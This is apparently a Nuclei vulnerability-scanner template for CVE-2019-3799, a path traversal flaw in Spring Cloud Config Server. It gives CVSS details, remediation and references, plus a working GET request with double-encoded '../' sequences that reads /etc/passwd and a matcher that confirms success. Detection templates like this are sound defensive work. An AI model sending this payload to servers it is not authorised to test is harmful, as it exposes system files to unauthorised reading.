id: CVE-2019-3799 info: name: Spring Cloud Config Server - Local File Inclusion author: madrobot severity: medium description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack. remediation: | Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 - https://www.oracle.com/security-alerts/cpuapr2022.html - https://nvd.nist.gov/vuln/detail/CVE-2019-3799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 epss-score: 0.01966 epss-percentile: 0.8747 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: spring_cloud_config tags: cve,cve2019,lfi http: - method: GET path: - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - 'root:.*:0:0:' - type: status status: - 200 # digest: 4a0a00473045022100a8a424befa8fb7153c9ae88194719e06e9b9b5f92f3d85537e60ecabb9c4a0fe02202ad38e5a429f08a08f2fd98c4dd95a82165383390ea08e9dffba4911569c3afd:922c64590222798bb761d5b6d8e72950